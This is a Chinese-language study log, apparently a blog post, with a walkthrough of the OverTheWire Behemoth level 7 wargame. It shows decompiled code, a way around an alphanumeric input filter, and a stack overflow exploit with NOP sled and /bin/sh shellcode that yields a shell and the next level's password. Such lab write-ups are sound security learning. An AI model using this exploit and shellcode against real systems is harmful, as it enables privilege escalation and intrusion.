1625-5 王子昂 总结《2017年9月8日》 【连续第340天总结】
A. WarGames-Behemoth
B.
Level 7
int __cdecl main(int argc, const char **argv, const char **envp)
{
size_t v3; // eax@2
int v5; // [sp+14h] [bp-20Ch]@13
signed int v6; // [sp+214h] [bp-Ch]@4
int i; // [sp+218h] [bp-8h]@1
const char *v8; // [sp+21Ch] [bp-4h]@1
v8 = argv[1];
for ( i = 0; envp[i]; ++i ) // 清空环境变量
{
v3 = strlen(envp[i]);
memset((void *)envp[i], 0, v3);
}
v6 = 0;
if ( argc > 1 )
{
while ( *v8 && v6 <= 511 )
{
++v6;
if ( !((*__ctype_b_loc())[*v8] & 0x400) && !((*__ctype_b_loc())[*v8] & 0x800) )
{
fprintf(_bss_start, "Non-%s chars found in string, possible shellcode!\n", "alpha");
exit(1);
}
++v8;
}
strcpy((char *)&v5, argv[1]);
}
return 0;
}这次的关键点在__ctype_b_loc()上,从程序来看是个数组
百度没找到什么有用的结果,不过从回复提示来看应该是检测“Non-alpha”字符的;试着输入字母和数字没反应,下划线等符号则会被检测出来
payload大部分都是非可见字符,因此肯定不在alpha字符中
不过有一个漏洞,就是*v8 && v6 <=511
这就意味着该检测只处理前512个字符,因此只需要用合法字符填充,将payload放在之后即可
尝试构造512*’a’+’-‘可以通过,验证猜想无误
另外注意堆栈结构,IDA显示v5的位置为ebp-0x20c,即理论上来说堆栈应该为
524(v5及之后的局部变量)+4(ebp保存)+4(函数返回地址)
构造Shellcode在gdb中实验后发现:
(gdb) r
python -c 'print "a"*524+"a"*4+"bbbb"+"\x33\xd2\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'Program received signal SIGSEGV, Segmentation fault.
0x2f2f6850 in ?? ()
说明中间有8个字节的偏移,应该就是见过很多次的编译器优化-寄存器指针对齐
在构造Shellcode的时候需要多加8个字符的偏移
然后就是找到地址,在gdb break main后查看堆栈,发现argv在0xffffd50a处附近
gdb getshell成功以后退出来在shell中运行发现地址不完全相同,加了100的Sled也不好使,一气之下直接搞了1000个字节,居然成了 简直暴力
behemoth7@behemoth:~$ /behemoth/behemoth7
python -c 'print "a"*524+"a"*8+"a"*4+"\xd8\xd5\xff\xff"+"\x90"*1000+"\x33\xd2\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'
$whoami
behemoth8
$cat /etc/behemoth_pass/behemoth8
pheewij7Ae
Level 8
Congratz!!
Now fight for your right to eip=0x41414141!!
本关结束了,最后这个不明白是什么意思,也没查到相关的信息(:з」∠)
C. 明日计划
WarGames
314
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
